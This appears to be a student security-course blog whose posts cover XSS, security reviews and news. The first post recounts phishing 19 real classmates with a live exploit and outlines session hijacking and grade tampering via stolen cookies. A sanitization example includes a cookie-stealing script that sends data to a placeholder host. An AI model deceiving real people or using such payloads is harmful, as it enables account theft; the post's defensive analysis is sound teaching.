UW CSE Resources

As an undergraduate student in the computer science department, you have a number of computing resources available to you. Many of these are accessed through the web browser and have private, personal information associated with them (for instance, MyCSE).

Experimental Attack

Since we were recently doing XSS attacks in our lab, I decided to experiment with them in a more realistic setting by sending a fake email to the cse484 mailing list, to see how many students and TAs would click:

Hey, I’m trying to set up my web server for lab 2, but I think I’m having DNS issues with the subdomain I set up not propagating. Can anyone check this page (http://security.30tonpress.com) and see if they get an OK page?

Thanks,
David

That URL then loaded a fake DNS success page, as well as version 1 of my Yoshoo exploit in a small FRAME at the bottom of the page. Surprisingly, 19 people in the class clicked the phishing link. Since class mailing lists are generally not thought of as adversarial places, students are much more likely to click links posted to them, especially if there's a halfway-decent cover story to back them up. This makes an adversary's life much easier.

There are a number of reasons someone might mount XSS attacks against CSE resources. For example, a malicious student might want to cause havoc and chaos for classmates by modifying what they have turned in, or someone might want to gain access to all the personal information that the CSE department has on another student.

Weakness #1 – Yoshoo Lab 2

The first attack is on Lab 2 for CSE484, and involves using any captured Yoshoo authtokens to change a student's grades back to zeroes for parts 1-5. This will cause them to lose points on the lab come grading time, lowering the average score on the lab and boosting the attacker's score with respect to the grading curve.

A stolen authtoken can be used to log into someone's y.um.my account and upload new phishing URLs. These URLs could then be used to grab authtokens for parts 1-5 of the grades DB. With these tokens, an adversary could easily change the grades using the same steps they followed for their own project.
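To make the replay step concrete, here is a minimal Python sketch of what "using a stolen authtoken" amounts to. The cookie name ("authtoken") and the grades endpoint URL are illustrative assumptions, not the real lab infrastructure:

```python
import urllib.request

# Hypothetical captured value from the phishing frame.
STOLEN_TOKEN = "deadbeef1234"

# Build a request that presents the victim's token as our own session.
# The URL and parameter names below are made up for illustration.
req = urllib.request.Request(
    "https://yoshoo.example/grades?part=3&score=0",
    headers={"Cookie": f"authtoken={STOLEN_TOKEN}"},
)

# The request is only constructed here, never sent. To a server that checks
# nothing but the cookie, it would be indistinguishable from a request made
# by the victim's own logged-in browser.
print(req.get_header("Cookie"))
```

The point of the sketch is that the token *is* the session: no password or further proof of identity is required once it has been captured.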

Weakness #2 – CSENetIDs

When accessing a protected resource on any *.cs.washington.edu host, the CSENetID service is used to authenticate the user in the browser. A cookie is then saved on the user's computer under the domain *.cs.washington.edu, with the key csenetid_l. This places implicit trust in every subdomain of cs.washington.edu: any malicious phishing page running on a cs.washington.edu subdomain and set up to capture document.cookie will pick up the CSENetID token of any user who has recently logged in.
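The scoping rule that makes this leak possible can be sketched in a few lines of Python. This is a simplified version of the RFC 6265 domain-matching algorithm, not the actual CSENetID code:

```python
# Why a cookie set with Domain=.cs.washington.edu is visible to every
# subdomain: simplified domain-match rule from RFC 6265, section 5.1.3.

def domain_match(request_host: str, cookie_domain: str) -> bool:
    """Return True if a cookie scoped to cookie_domain is sent to request_host."""
    cookie_domain = cookie_domain.lstrip(".")  # ".cs.washington.edu" -> "cs.washington.edu"
    return (request_host == cookie_domain
            or request_host.endswith("." + cookie_domain))

# The csenetid_l cookie, scoped to the parent domain, follows the user everywhere:
print(domain_match("www.cs.washington.edu", ".cs.washington.edu"))                 # True
print(domain_match("evil-project.cs.washington.edu", ".cs.washington.edu"))        # True

# A host-only cookie would not leak to sibling subdomains:
print(domain_match("evil-project.cs.washington.edu", "www.cs.washington.edu"))     # False
```

Any student who can stand up a page on any cs.washington.edu subdomain is therefore inside the cookie's trust boundary.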

Once an attacker has that token, they can spoof the victim's session. If the CSENetID auth service does any additional IP validation of the machine, the phished user's IP can be spoofed as well in order to fool the web server into granting the attacker access.

Potential Defenses

There are defenses against these attacks that can be implemented on both the server-side and the client-side.

On the server-side, any site that wants to use CSENetID authorization could explicitly talk to an authorization server within its web application's code (given a standard module for use with different languages like PHP, Python, etc.). This could then set an authtoken cookie only on the CSE subdomain that needs authorization. However, this has two downsides. One is that every subdomain would require the user to log in again. Another is that if the module is not well designed, some of the burden of providing a high level of security would be shifted to each individual web application, as opposed to one central module.
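A minimal sketch of what such a module might emit, using Python's standard http.cookies. The function name and cookie name are hypothetical; the key point is what is omitted and what is added:

```python
from http import cookies

def make_auth_cookie(token: str) -> str:
    """Build a hardened Set-Cookie value scoped to a single subdomain (sketch)."""
    c = cookies.SimpleCookie()
    c["authtoken"] = token
    # Deliberately no Domain attribute: the cookie becomes host-only and is
    # sent back only to the exact host that set it, never to sibling
    # subdomains of cs.washington.edu.
    c["authtoken"]["path"] = "/"
    c["authtoken"]["secure"] = True    # only transmitted over HTTPS
    c["authtoken"]["httponly"] = True  # invisible to document.cookie, so an
                                       # XSS payload cannot read it
    return c["authtoken"].OutputString()

print(make_auth_cookie("deadbeef1234"))
```

Even if the per-subdomain login requirement were judged too annoying, the HttpOnly flag alone would defeat the document.cookie capture described above.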

On the client-side, there are a number of Firefox extensions that can make browsing safer. One is NoScript, which only lets JavaScript, Java, and Flash execute on sites you explicitly trust; this way, you can check out a link before deciding to let it run arbitrary code. In addition, Google provides a Firefox plugin, based on data it has gathered about various phishing sites, that alerts users when they are about to visit a known XSS site.

Conclusions

Even in the context of a security-focused class, a good portion of students still clicked my phishing link. For this reason, it is extremely important for clients of web applications to install plugins that enable them to spot phishing attacks and respond to them. There is also an obligation on anyone running a server-side application to sanitize any XSS vectors and to reduce the amount of data that is exposed via cookies.
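"Sanitizing XSS vectors" mostly comes down to escaping untrusted input before echoing it into a page. A minimal Python sketch (the function name is illustrative):

```python
import html

def render_comment(user_input: str) -> str:
    """Escape untrusted text before embedding it in HTML, so an injected
    <script> tag renders as inert text instead of executing."""
    return "<p>" + html.escape(user_input) + "</p>"

# A classic cookie-stealing payload of the kind used in the lab:
payload = '<script>new Image().src="http://evil/?c="+document.cookie</script>'
print(render_comment(payload))
# The <script> tag comes out as &lt;script&gt;...&lt;/script&gt; and is
# displayed to the reader rather than run by the browser.
```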

Posted in Ethics, Privacy, Security Reviews | 2 Comments

Large Number of Windows Security Breaches Caused by Administrative Privileges

An article linked today on Slashdot revealed that a vast majority of security breaches could be prevented if users were not logged in with administrative privileges.  While this is not terribly surprising, the numbers were rather shocking.  The report suggests that 92% of the 154 major security breaches were caused by users having administrative privileges.  Windows Vista’s User Account Control (UAC) has long been criticized for its excessive use of popup windows, and it seems that, aside from being an annoyance, the measures put in place to help secure a system have become a vulnerability.


Posted in Current Events | Comments Off on Large Number of Windows Security Breaches Caused by Administrative Privileges

Security Review: GPeerReview

GPeerReview is a new project that attempts to create a web of trust for scientific publications. The goal is to have people read papers, leave comments, and digitally sign them with GPeerReview. The review could then be sent to the author, and if the author likes it, they could include it with their list of works. This would filter out false and possibly malicious reviews. Peer-review comments would hopefully lend credibility to an author's work through many positive reviews.

The reasons for using GPeerReview are stated on its Google Code page. Since peer reviews give credibility to an author's work, it is important to get them. However, false reviews can be damaging, so it is important to trust the reviewers, to be able to associate each reviewer with their review, and to tie the review to the correct publication. Through this system, a web of trust would be created, allowing employers, journals, and conferences to use the tool as a criterion for acceptance. Additionally, a publication can gain credibility after publication, allowing papers to be published early and reviewed later. The ultimate goal is to revolutionize scientific publishing, much as the World Wide Web revolutionized media publishing.
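The binding between reviewer, review, and publication can be sketched in a few lines. The real tool uses public-key (GPG-style) signatures; since stdlib Python has no asymmetric crypto, this stand-in uses HMAC with a reviewer-held secret purely to illustrate the flow, and all names here are hypothetical:

```python
import hashlib
import hmac

# Stand-in for the reviewer's private key (assumption; GPeerReview would use
# an actual keypair so anyone can verify with the public half).
REVIEWER_SECRET = b"reviewer-private-key-stand-in"

def sign_review(paper_text: str, comment: str) -> dict:
    # Bind the comment to the exact paper via its hash, so a positive review
    # cannot be reattached to a different publication.
    paper_digest = hashlib.sha256(paper_text.encode()).hexdigest()
    message = (paper_digest + "\n" + comment).encode()
    return {
        "paper_sha256": paper_digest,
        "comment": comment,
        "signature": hmac.new(REVIEWER_SECRET, message, hashlib.sha256).hexdigest(),
    }

def verify_review(paper_text: str, review: dict) -> bool:
    expected = sign_review(paper_text, review["comment"])["signature"]
    return hmac.compare_digest(expected, review["signature"])

review = sign_review("The paper's full text...", "Sound methodology; accept.")
print(verify_review("The paper's full text...", review))  # True
print(verify_review("A different paper...", review))      # False
```

The hash-of-the-paper step is what prevents the "false review" and misattribution problems the project description worries about.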


Posted in Security Reviews | Comments Off on Security Review: GPeerReview

Security Review: Google Latitude, tracking friends on Google Maps

A recent article on Slashdot reports that Google will soon release new software, dubbed 'Latitude', enabling users to broadcast their geographic location via Google Maps.  This information can be gathered either from mobile phones, via GPS or local cell phone towers, or from laptop computers, via Wi-Fi access points.  Once the data is uploaded, users can decide with whom to share their location, and to those lucky few their location is shown as an icon with their chosen picture on top of a Google Maps display.  The initial release will support BlackBerry, Android, and Windows Mobile phones, with likely updates to include iPhones and iPod Touches.

Google has long had the ability to locate its users, a function predominantly featured on the iPhone.  What distinguishes 'Latitude', however, is the ability to take this information and share it with others.  Location data will thus have to be stored on Google's servers in order for others to access it and display it on their screens.  Obviously this generates numerous privacy concerns; however, Google attempts to address these by claiming that the feature will only display information to people the user chooses, and that it can be easily disabled at any time.  Google also claims that the company will not collect a large database of geographic information, and that the only location data stored on its servers will be the most recent location uploaded.

Posted in Physical Security, Privacy, Security Reviews | Tagged , , | 1 Comment

Security Review: Robot Scientist automates the discovery of new drugs!

A group of researchers working on the EU-funded IQ project have put together a robot scientist that can devise a theory, come up with experiments to test it, carry out the physical experiments, interpret the results, and then repeat the cycle. This system has the potential to revolutionize drug discovery, which until now has been either serendipitous or the result of random experiments on thousands of chemical compounds. The technology, which employs advanced artificial intelligence and data mining, could pave the way for cheaper, faster, and more effective methods in areas of scientific research that require some level of automation.

The development of medication is a sensitive topic: it is vital to medicine and the health of all people, and it has core political and economic implications. To prevent consumer abuse, many governments regulate the manufacturing, sale, and development of drugs. The robot scientist makes a rough approach to finding a drug easy, so it is important to analyze its security. The major components of the system are an inductive database, which stores all the raw data (chemical compound compositions and pharmacological activity), data patterns, and experiment results; the artificial-intelligence and data-mining software; and the physical portion that conducts the experiments.

Assets/Security Goals

- A major asset, and the main security goal, is the integrity of the database, which houses all the raw data, patterns, and experiment results; these must be prevented from falling into the hands of adversaries.

- Another important security goal is to make sure that the robot that handles all the fluids and compounds and performs the experiments is in good working order. Even if everything else in the system is fine, sabotage of any of the robot's parts would make the experiment results incorrect, misleading, and useless.

Potential Threats/Adversaries

- A competing pharmaceutical company might want to take advantage of the data and results the robot has collected so far and use the stolen information for its own research. Its motive could also simply be to jeopardize the company's prospects in medicinal research by modifying the database and thereby corrupting future experiment results.

- A malicious third party that wants to create medical havoc could do so by extracting information from the database about compounds that have adverse effects on the human body and using it to concoct harmful drugs.

Potential Weaknesses

- Implementation bugs in the data-mining and AI software could lead the robot to make wrong decisions about which experiment to conduct, and all the results inferred from those experiments would be wrong as well.

- Having all the data stored in one database is another weakness: a technical problem or power outage risks losing all of this carefully gathered and computed data.

- If access to the database is not restricted to authorized users, the system is vulnerable to an attacker who gains access and manipulates its contents.

- The physical component (the liquid-mixing robot) that actually performs the experiments is a further weakness. A loosened or worn-out part, or a screw missing here and there, could corrupt the outcome of an experiment.

Defenses

- Access to the database must be restricted to authorized users so that information does not fall into the wrong hands.

- The database should be backed up to prevent data loss in case of emergencies.

- The physical components should be checked for maintenance issues from time to time and monitored to some extent.

Overall, this scientific robot is going to be a great asset to medicinal research, greatly improving on current procedures. It is important for us to understand that this system is dealing with and storing highly complex, sophisticated data that has a close connection to the future of medicine. Everything feasible should be done to make sure that this system is used for the benefit of humankind and not otherwise.

http://www.sciencedaily.com/releases/2009/02/090202140042.htm

Posted in Security Reviews | Comments Off on Security Review: Robot Scientist automates the discovery of new drugs!

Current Event: Zombies Ahead

According to a story on NBC Dallas-Fort Worth, someone hacked into an electronic road-sign system designed to notify motorists of upcoming hazards.  The sign was altered to read “Caution! Zombies! Ahead!!!”  It also instructed motorists to run for cold climates and warned that “the end is near.”  The story can be found here: http://www.nbcdfw.com/traffic_autos/transit/Zombies-Run-TxDOT-is-Not-Amused.html


Posted in Current Events | 4 Comments

Current Event: WarCloning Passport RFID Tags

According to Slashdot, researcher Chris Paget was able to capture many identification numbers from the new passports containing RFID tags while driving around San Francisco. Using $250 of equipment (an RFID reader and an antenna) hooked up to his laptop, Paget was able to read the identification numbers of the passport RFID tags from up to 20 feet away. According to Paget, it could be possible to read the tags from hundreds of feet away, since they are actual radio signals. It is then “trivial to program” a blank tag with the retrieved identification numbers, and it is these numbers that are used to verify the RFID tag.

Posted in Current Events, Policy, Privacy, Research | Tagged , | 1 Comment

Security Review: Cryptography

Posted in Miscellaneous | Tagged | 2 Comments

Current Event: The Internet Is Unsafe

The BBC reports that a group of experts at the World Economic Forum in Davos, Switzerland met to discuss the increasing pervasiveness of organized cybercrime and cyber warfare. One expert claimed that the past year saw more malicious internet activity than the previous five years combined (the expert asked to remain anonymous in order not to be compelled to substantiate this claim).

There have been increasing findings of botnets being used by networks of professionals, including computer experts and lawyers, to steal credit card information–and in some cases channel it to other countries. Such activities serve to delegitimize the internet as a safe place for transactions, and as businesses have become increasingly integrated with the Web, this is a grave threat to their economic viability. Furthermore, as the internet has become “part of society’s central nervous system,” the health of entire economic systems may be at stake.

Perhaps even more unsettling are recent DoS attacks by Russia against the web infrastructure in Estonia and Georgia, as well as an accidental DoS against YouTube caused by state censorship in Pakistan. These attacks, which can take effect in a matter of minutes, show that the danger extends beyond the economy, as they are clearly of extreme import to national security as well.

What makes the internet so unsafe? The panelists observed that it was originally “organised around the principle of trust,” and that this has led to inherent vulnerabilities. Some panelists asked whether drastically increased measures for quarantining infected computers would be necessary; one suggested the formation of a “World Health Organization for the internet,” which would do just that by implementing a strategy against botnets similar to that employed against the more dangerous contagions.

On the other hand, some expressed concern that such measures would too severely compromise the privacy of users, in addition to requiring immense resources to implement. It would be better, they argued, to “foster the civic spirit of the web,” promoting organizations built on mutual aid and development.

I agree with the latter group that this issue cannot be resolved simply by throwing more experts and money at it (although that might not hurt). The problem has to be understood in a larger social and economic context. I don’t claim to know what would make a lawyer decide that it was worth it to turn to organized cybercrime to make more money, but I think an effort to understand and remove these motivations might prove more cost-effective over time than only addressing the security aspect of the problem. Perfect security is impossible; if someone is resourceful enough, they will always be able to find vulnerabilities in the internet to exploit (if nothing else, the human element makes this true). It is definitely worth it to try to make these vulnerabilities harder to find, but this cannot be the entire solution. The causes of internet criminality must also be taken into account.

And yet, when multiple nations become involved, more drastic measures may be the only ones that remain viable. An article a little over a year ago in the Guardian reports on an organization known as the Russian Business Network (RBN)–which is suspected of being involved in approximately 60% of all internet crime–and provides evidence suggesting that the Russian government has little interest in stopping it. In this case, as the article indicates, nothing short of an international body of law and an organization to enforce it can really address this. The job of this organization should not be to contain all internet attacks, but to prevent them from being used as an instrument of coercion by one country against another. This kind of cyber warfare should be understood in the same way as a conventional attack, and dealt with accordingly. Only an international effort can accomplish this.

Posted in Current Events | 2 Comments

Wikipedia Editing Could Be Made More Restrictive Due to Vandalism

According to this article, the English version of Wikipedia may implement a system called “flagged revisions” in its editing software, which would require that edits be approved (“flagged”) by a “trusted” user (see the Wikipedia page on flagged revisions here). Edits that have not yet been approved could be viewed by users on request, but the default version of a page would exclude any changes that have not yet been approved. Trusted users’ edits are automatically approved. There could be long wait times for edits to be approved; this system has already been implemented in the German version of Wikipedia, where edits have taken as long as three weeks to be approved.

Posted in Availability, Current Events, Integrity | Tagged | 4 Comments